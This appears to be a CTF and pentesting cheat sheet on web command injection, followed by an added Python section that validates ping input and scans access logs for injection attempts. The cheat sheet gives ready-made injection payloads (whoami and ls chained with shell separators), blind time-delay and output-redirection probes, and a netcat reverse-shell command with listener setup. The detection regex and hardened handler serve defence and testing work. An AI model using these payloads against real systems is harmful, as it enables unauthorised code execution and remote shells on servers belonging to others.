[COMMAND INJECTION / RCE]
GENERAL INFORMATION
DESCRIPTION: Collection of different tests to confirm the vulnerability; the result can sometimes be reflected in the browser.

NOTE: Manual inspection is needed: source code, headers, behavior, etc. You can use variants of the shell separator symbols to pipe and chain more commands to retrieve content. [ ; or & or && and | or || ]

C1: ';whoami;#
C2: ';which php;#
C3: 1|whoami

SAMPLE: /?q='whoami'

NOTE: If possible, try any command to get some kind of reverse shell! For that, check what technologies are present and change the technology in the check (C2) to validate it.

In a CTF style, it is pretty common to see a web page with some functionality, maybe connectivity tests or log information.

Things to check:
1. Input fields without proper validation?
2. Any known functionality? PING, DNS, etc.
3. Is the action providing some results?

How to test:
1. Use the ";" to add more commands and see if the output reflects what you are doing.
   SAMPLE PING SCENARIO SHOWING DIR CONTENT: action=ping&ip_address=10.12.180.20;ls&submit=Action
2. Start enumeration and read files to move on.

::: GENERATE A SHELL
C1: && nc -vn IP_ADDR PORT -e /bin/bash
NOTE: Remember to set up a listener, "nc -lvp PORT".
See: REVERSE SHELL (payloadallthethings)

BLIND COMMAND INJECTION
NOTE: It will be more related to behavior, similar to blind SQLi. Content in browser, cookies, etc.

COMMON ATTEMPTS
::: TIME DELAY
1. Identify the vulnerable parameter.
2. Attempt different tests on each field. [encode payloads]
C1: /?q='sleep 10'
C2: & sleep 10 #
C3: x||ping+-c+10+127.0.0.1||

::: OUTPUT REDIRECTION
1. Identify the vulnerable parameter.
2. Find a path with the necessary rights to write the output data.
3. Navigate to the path and load the file to check the results.
C1: ||whoami>/path/to/file/output.txt||
After the output is complete, you can read the file by invoking its name.
SAMPLE: /temp?filename=output.txt
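The defensive counterpart to the ping scenario and the time-delay probes above, as an added example that is not part of the original notes: it validates the ip_address parameter with the ipaddress module, runs ping through an argv list (no shell), and flags request parameters carrying the separators and delay payloads listed here. The function names, the regex and the access-log lines are constructed for illustration.

```python
# Added example, not from the original notes; names and log lines are constructed.
import ipaddress
import re
import subprocess
from typing import Dict, Iterator, List, Tuple
from urllib.parse import unquote_plus

# Separators from the notes (; & && | ||) plus $() backticks, redirection, newlines,
# and the blind-injection time-delay probes (sleep, ping -c).
INJECTION_RE = re.compile(r"[;&|`$()<>\n]|\bsleep\b|\bping\s+-c\b", re.IGNORECASE)

def build_ping_command(ip_address: str) -> List[str]:
    """Validate the parameter and return an argv list for ping (ValueError if bad).
    ip_address() rejects '10.12.180.20;ls'; an argv list is never parsed by a
    shell, so a separator can never start a second command."""
    addr = ipaddress.ip_address(ip_address.strip())
    return ["ping", "-c", "1", str(addr)]

def run_ping(ip_address: str) -> str:
    """Hardened handler: no shell=True, no string building, bounded runtime."""
    proc = subprocess.run(build_ping_command(ip_address), capture_output=True,
                          text=True, timeout=10)
    return proc.stdout

def suspicious_params(query: str) -> Dict[str, str]:
    """Return query parameters whose decoded value carries injection markers.
    Split on '&' only: a ';' inside a value is payload, not a separator."""
    found = {}
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if INJECTION_RE.search(value):
            found[name] = value
    return found

QUERY_RE = re.compile(r'"(?:GET|POST) \S*?\?(\S*) HTTP/')

def scan_access_log(lines: List[str]) -> Iterator[Tuple[int, str, str]]:
    """Yield (line_no, parameter, decoded value) for each flagged request."""
    for line_no, line in enumerate(lines, start=1):
        m = QUERY_RE.search(line)
        if m:
            for name, value in suspicious_params(m.group(1)).items():
                yield line_no, name, value

# Constructed log: line 2 mirrors the ';ls' sample above, line 3 a time-delay probe.
CONSTRUCTED_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /ping?action=ping&ip_address=10.12.180.20&submit=Action HTTP/1.1" 200',
    '10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /ping?action=ping&ip_address=10.12.180.20;ls&submit=Action HTTP/1.1" 200',
    '10.0.0.9 - - [01/Jan/2024:12:00:07 +0000] "GET /?q=x||ping+-c+10+127.0.0.1|| HTTP/1.1" 200',
]
```

Running `list(scan_access_log(CONSTRUCTED_LOG))` reports lines 2 and 3 only; the legitimate request on line 1 passes, and `build_ping_command("10.12.180.20;ls")` raises ValueError before anything is executed.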
©® - 2023/2024.